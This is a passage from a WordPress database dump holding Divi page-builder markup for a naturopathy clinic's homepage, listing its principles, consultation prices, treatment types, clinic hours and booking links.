compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-27 21:29:39','2021-05-27 13:29:39','',28,'https://verdenaturopathy.com.au/?p=259',0,'revision','',0),(248,1,'2021-05-27 21:15:15','2021-05-27 13:15:15','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"IMG_20200714_175859_865\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online telehealth consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" locked=\"off\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" 